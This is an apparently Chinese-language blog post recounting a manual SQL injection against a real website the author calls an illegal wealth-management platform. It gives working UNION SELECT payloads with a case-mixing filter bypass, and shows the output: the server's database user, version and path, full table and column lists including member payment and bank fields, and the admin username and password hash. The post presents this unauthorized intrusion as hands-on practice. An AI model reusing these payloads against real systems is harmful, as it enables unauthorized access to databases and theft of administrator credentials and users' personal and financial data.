实战手注某非法理财网站
实战手注某非法理财网站,实战才能出技术。加油吧。
在一个群里看到一个大牛发来这个站。就想弄一下了。联系一下手工。
Action
MySQL Query:select * from dg_news where id = 1\'
MySQL Error:You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'' at line 1
MySQL Errno:1064
Message:MySQL Query Error
PS:从此信息中我们得到了表明dg_news
猜解字段数长度
得出字段数5
爆显示位:
尝试绕过。
大小写直接就可以绕过。再尝试一下其他的姿势。其实也是可以绕过的。
行了吧。开始收集信息。
Mysql路径:C:/phpStudy/MySQL/
Mysql版本:5.5.53
用户:root@localhost
当前库:xinanwealth
爆出所有表明payload(http://www.xxxx.com/aboutus/newsinfo.php?id=-1 Union sElect 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x78696E616E7765616C7468--+)
dg_about,dg_about_category,dg_admin,dg_announce,dg_desc,dg_help,dg_help_category,dg_member,dg_member_cashback,dg_member_companypay,dg_member_config,dg_member_deal,dg_member_forgot_logs,dg_member_level,dg_member_licai_list,dg_member_logs,dg_member_msg,dg_member_order,dg_member_pay_log,dg_member_send_mobile,dg_member_touzi_list,dg_money_sql
dg_admin表是我们想要的。
爆所有列payload(http://www.xxxx.com/aboutus/newsinfo.php?id=-1 Union sElect 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0x78696E616E7765616C7468--+)
id,title,content,addtime,type,id,name,en,id,roleid,username,password,id,classid,title,content,posttime,id,guanyu,hezuo,jiegou,zizhi,lianxi,id,title,content,addtime,type,id,name,en,id,username,pwd,paypwd,mobile,email,logintime,lognum,state,inviter,ip,posttime,amount,realname,level,address,qq,question,answer,ismobile,isquestion,isbank,bankna
爆破管理员账号密码:http://www.xxx.com/aboutus/newsinfo.php?id=-1 Union sElect 1,username,password,4,5 from dg_admin
这密码:FAQeEUUdVwVXA1EABlQE8eb8a0926c谁知道这是什么JB加密不。
真尼玛让人尴尬
结束
By:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*